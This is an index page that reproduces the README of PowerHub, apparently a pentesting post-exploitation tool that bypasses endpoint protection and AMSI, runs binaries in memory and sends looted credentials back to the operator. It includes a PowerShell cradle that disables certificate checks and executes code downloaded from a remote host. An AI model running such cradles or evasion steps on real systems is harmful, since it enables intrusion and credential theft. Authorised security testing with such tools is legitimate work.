Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/adrianvollmer/powerhub
A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting
https://github.com/adrianvollmer/powerhub
pentest post-exploitation powershell python remote-admin-tool
Last synced: 3 days ago
JSON representation
A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting
- Host: GitHub
- URL: https://github.com/adrianvollmer/powerhub
- Owner: AdrianVollmer
- License: mit
- Created: 2018-07-29T07:45:05.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2024-11-13T08:10:42.000Z (about 1 month ago)
- Last Synced: 2024-12-12T12:06:16.735Z (10 days ago)
- Topics: pentest, post-exploitation, powershell, python, remote-admin-tool
- Language: PowerShell
- Homepage: https://adrianvollmer.github.io/PowerHub/
- Size: 7.17 MB
- Stars: 769
- Watchers: 18
- Forks: 125
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Changelog: CHANGELOG.md
- License: LICENSE
Awesome Lists containing this project
README
PowerHub
========PowerHub is a convenient post exploitation tool for PowerShell which aids a
pentester in transferring data, in particular code which may get flagged by
endpoint protection. Features:* Fileless
* Stateless
* Cert pinning
* String "obfuscation" by RC4 encryption
* Choose your AMSI Bypass
* Transparent aliases for in-memory execution of C# programs![PowerHub Webapp](docs/img/powerhub-webapp.png)
![PowerHub Webapp](docs/img/powerhub-sharphound.png)During an engagement where you have a test client available, one of the
first things you want to do is run SharpHound, Seatbelt, PowerUp,
Invoke-PrivescCheck or PowerSploit. So you need to download the files,
mess with endpoint protection, disable the execution policy, etc.
PowerHub provides an (almost) one-click-solution for this. Oh, and you can
also run arbitrary binaries (PE and shell code) entirely in-memory using
PowerSploit's modules, which is sometimes useful to bypass application
whitelisting.Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back
either as a file or a text snippet, via the command line or the web
interface. PowerHub also helps with collaboration in case you're a small
team.Here is a simple example (grab information about local groups with PowerView
and transfer it back):```ps1con
PS C:\Users\avollmer> [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Nxois='bZeVBC4vZfakT5SmCcaFam6IRY6UNLnC';$Plukgmio=New-Object Net.WebClient;IEX $Plukgmio.DownloadString('https://192.168.11.2:8443/')
_____ _____ _ _ _ _______ ______ _ _ _ _ ______
|_____] | | | | | |______ |_____/ |_____| | | |_____]
| |_____| |__|__| |______ | \_ | | |_____| |_____]
2.0.0 written by Adrian Vollmer, 2018-2024
Run 'Help-PowerHub' for help
PS C:\Users\avollmer> Get-HubModule PowerViewName : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1
Type : ps1
N : 205
Loaded : True
Alias :PS C:\Users\avollmer> Get-LocalGroup | PushTo-Hub -Name groups.json
```Documentation
=============Read the docs [here](https://adrianvollmer.github.io/PowerHub/).
* **Installation:**
* **Usage:**
* **Contributing:**
* **Changelog:**Credits
=======PowerHub is partially based on the awesome work of zc00l, @am0nsec, mar10,
p3nt4. And of course, it would be nothing without @harmj0y,
@mattifestation and the many other contributors to
[PowerSploit](https://github.com/PowerShellMafia/PowerSploit).Thanks!
Author and License
==================Adrian Vollmer, 2018-2024. MIT License.
Disclaimer
==========Use at your own risk. Do not use without full consent of everyone involved.
For educational purposes only.